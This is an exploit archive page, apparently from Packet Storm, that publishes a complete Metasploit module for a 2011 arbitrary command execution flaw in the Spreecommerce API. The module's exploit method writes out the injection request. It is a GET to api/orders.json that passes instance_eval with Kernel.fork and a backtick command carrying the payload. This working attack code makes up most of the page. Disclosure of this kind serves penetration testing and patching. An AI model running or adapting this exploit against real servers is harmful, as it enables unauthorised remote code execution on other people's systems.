Spreecommerce Arbitrary Command Execution

Spreecommerce Arbitrary Command Execution: Posted Apr 22, 2011; Authored by joernchen | Site metasploit.com; This Metasploit module exploits an arbitrary command execution vulnerability in the Spreecommerce API searchlogic. Unvalidated input is called via the Ruby send method allowing command execution.; tags | exploit, arbitrary, ruby; advisories | OSVDB-71900; SHA-256 | 5f324564c756ec1163ada3b1c576328ce33a96570f58fa83e43acb3bf9d56e4e; Download | Favorite | View

Spreecommerce Arbitrary Command Execution

##
# $Id: spree_searchlogic_exec.rb 12397 2011-04-21 19:38:42Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Spreecommerce < 0.50.0 Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Spreecommerce API searchlogic. Unvalidated input is called via the 
          Ruby send method allowing command execution.
      },
      'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 12397 $',
      'References'     =>
        [
          [ 'OSVDB', '71900'],
          [ 'URL', 'http://www.spreecommerce.com/blog/2011/04/19/security-fixes/' ],

        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 31337,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Apr 19 2011',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URI', [true, "The path to the Spreecommerce main site", "/"]),
        ], self.class)
  end

  def exploit
    command = Rex::Text.uri_encode(payload.encoded)
    urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
    res = send_request_raw({
      'uri'     => urlconfigdir,
      'method'  => 'GET',
      'headers' =>
      {
        'HTTP_AUTHORIZATION' => 'ABCD', #needs to be present
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Connection' => 'Close',
      }
    }, 0.4 ) #short timeout, we don't care about the response
    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
    end
    handler
  end

end

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

Spreecommerce Arbitrary Command Execution

Spreecommerce Arbitrary Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Spreecommerce Arbitrary Command Execution

Share This

Spreecommerce Arbitrary Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems